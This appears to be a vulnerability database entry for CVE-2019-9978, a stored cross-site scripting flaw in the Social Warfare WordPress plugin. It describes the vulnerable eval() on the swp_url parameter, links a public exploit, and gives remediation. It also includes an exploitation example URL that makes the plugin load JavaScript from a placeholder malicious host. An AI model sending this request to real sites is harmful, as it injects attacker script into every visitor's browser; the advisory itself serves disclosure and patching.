Main Vulnerability Database Exploits ID:8880 - Exploit for Cross-site scripting in WordPress Social Sharing Plugin - Social Warfare - CVE-2019-9978

ID:8880 - Exploit for Cross-site scripting in WordPress Social Sharing Plugin - Social Warfare - CVE-2019-9978

Published: March 2, 2023

Vulnerability identifier: #VU18052

Vulnerability risk: High

CVE-ID: CVE-2019-9978

CWE-ID: CWE-79

Exploitation vector: Remote access

Vulnerable software:
WordPress Social Sharing Plugin - Social Warfare

Link to public exploit:

https://github.com/d3fudd/CVE-2019-9978_Exploit

Vulnerability description

The vulnerability allows a remote attacker to perform cross-site scripting attacks.

The vulnerability exists due to usage of the eval() JavaScript call on data passed via the "swp_url" HTTP GET parameter to "/wp-admin/admin-post.php" script, when "swp_debug" is set to "load_options", allowing to permanently inject and execute arbitrary JavaScript code on the website. A remote unauthenticated attacker can store a specially crafted JavaScript code into database and execute it in browser of every website visitor.

Note: this vulnerability is being actively exploited in the wild.

Exploitation example:

http://[host]/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://[malicious_js_script]/

Remediation

Update to version 3.5.3.

ID:8880 - Exploit for Cross-site scripting in WordPress Social Sharing Plugin - Social Warfare - CVE-2019-9978

Link to public exploit:

Vulnerability description

Remediation

Please verify you're human